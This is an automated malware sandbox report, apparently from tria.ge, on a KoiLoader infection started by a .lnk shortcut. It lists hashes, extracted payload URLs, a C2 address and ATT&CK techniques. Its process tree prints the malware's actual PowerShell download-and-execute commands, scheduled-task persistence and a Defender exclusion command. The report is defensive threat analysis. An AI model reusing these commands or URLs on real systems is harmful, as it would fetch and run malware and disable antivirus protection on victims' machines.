Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
03/12/2024, 08:14
General
-
Target
e02e837f8b43f14dd1de0c924fb9c7c2ead99fe1589bfb5126f120be5bc8599b.lnk
-
Size
3KB
-
MD5
ef8150f41db3c25684ff13470182898f
-
SHA1
6a10b98d8cd2fb0fa641d282ea30fc196638b8cd
-
SHA256
e02e837f8b43f14dd1de0c924fb9c7c2ead99fe1589bfb5126f120be5bc8599b
-
SHA512
d7937781c09595c1b0c4a058929579a7499b7e28c67ef48f3ab6704a4c3b2b80cea38a1452f275e0b1205ddbabeeceaadf3c3fcd84be8fb6270904859eeff6c3
Malware Config
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
Extracted
koiloader
http://195.123.217.43/oversate.php
-
payload_url
https://www.italialife24.it/wp-content/uploads/2021/05
Signatures
-
KoiLoader
KoiLoader is a malware loader written in C++.
-
Koiloader family
-
Detects KoiLoader payload 2 IoCs
-
Blocklisted process makes network request 9 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Using powershell.exe command.
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Indicator Removal: Clear Persistence 1 TTPs 2 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
-
Suspicious use of WriteProcessMemory 34 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\e02e837f8b43f14dd1de0c924fb9c7c2ead99fe1589bfb5126f120be5bc8599b.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\Admin\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl03⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\22N5NG1GVHIS.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\22N5NG1GVHIS.js "2⤵
- Blocklisted process makes network request
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f3⤵
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\22N5NG1GVHIS.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z6UGKSMBKAI'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\22N5NG1GVHIS.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\22N5NG1GVHIS.js "2⤵
- Blocklisted process makes network request
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f3⤵
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\22N5NG1GVHIS.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z8G17ASWGHN'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r4304acb9-c3f6-452a-9860-eb4e85d38d4er.js"1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5bc704924787fbe6110e81123db20206a
SHA1427cec9511769e702b5c8d5b4189578bfbd2b7ad
SHA256d27ee28176f0e663dac01e827929ede1cb63c2ef187c3dac77db6d6292e55eea
SHA5124045aa38438f0a8e87ecb1066d532655033ccd5eaf5752a45aab89616165912c37308e4654dad3ff8fdcbdc377bd2dfab57567129284c10330e41cdf470507e7
-
Filesize
1KB
MD50122642b49ee1713f017076a6e0c6791
SHA1400864355e8c9e0822b3b9173844697c27f4a022
SHA256b56d33a2084a5eb64b4eb5467e47c40140a2a67d5e58aca3e6ad6906f7c670a1
SHA512b35344794213aa3c50c68485b534b71217c232f2388c40c215ba3ffe677b4cfe6d371e48ffe9a10c0f38e844db3eef2184c238c497cd472d6ff5b70d026e6f3b
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
19KB
MD5ecfd8818d0ef5f8e6995b2421085d7d3
SHA197b75e0cc8d71bd20200fb6d1d3cea17d5d9dcfb
SHA2568a6f44ab7df5879e777e4a8b2207c7f5e0b9a1821fdb617eb3928386027b45c5
SHA51286663f3769c9b985b3e9738f03bcbdadc8d560d2ea9da39b338d6b09453ca8d4b62792a06e23ff62b2c57a0b9514f40f771d551e3f6edb11706aa9596ea29a56
-
Filesize
1KB
MD5477031a32089e6d066092d640b526add
SHA15041602c7c71b4c6e40928039dcc07b6b32a67f2
SHA2560ec3dcb238a28e1b43e2f7b03f955f6304927314c40a51f1d4b2b00345c12bef
SHA51201388ea1af8248901beb17d1fa62efead2ae1bf9accfc8e132f4f0c0e77c068fd7e998d218043fdc90c497824ca3723689502490da4fd97237a4f0d40ef2bb4e
-
Filesize
1KB
MD5ae343a0c544713797d1582baed41cd6c
SHA1170efb0fbebe36a6f605c6cfd664525f1158a58e
SHA256dbc33d6f061613aaf9ec0a3472b37ec709ac168cde70c7b48c5807765f3ed292
SHA51268afed158e066e67d6526627ceda320e1702779b95b8fe597ef573c1be7bcef0dc19f0e6fc17e8103c16fb0aa77d83e06e5f64435100d60193e3ee72e9bbc8b5
-
Filesize
1KB
MD5a5c074e56305e761d7cbc42993300e1c
SHA139b2e23ba5c56b4f332b3607df056d8df23555bf
SHA256e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953
SHA512c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8
-
Filesize
304B
MD5078c4d308ffa33a6c085f1a7a08a08ca
SHA116645fb11e02d578709317b4ef5e6e4d41028df7
SHA2567c62714d6a0e86080b313d45cac54fd68deeabd3608046951243754dfb84c8fb
SHA5126bba6fe0b9623916eefe85d97fc1103e0e2dc95f70a60164ffb19241ae4270782e0f6f5fc458cc200414bcf237f7ce592f9d7c4a44ffdbd83f6008bee0430a36
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
136KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
5.6MB
-
Filesize
136KB
-
Filesize
584KB
-
Filesize
320KB
-
Filesize
104KB
-
Filesize
52KB
-
Filesize
200KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
32KB
-
Filesize
652KB
-
Filesize
40KB
-
Filesize
600KB
-
Filesize
68KB
-
Filesize
56KB
-
Filesize
80KB
-
Filesize
104KB
-
Filesize
6.2MB
-
Filesize
52KB
-
Filesize
4KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
216KB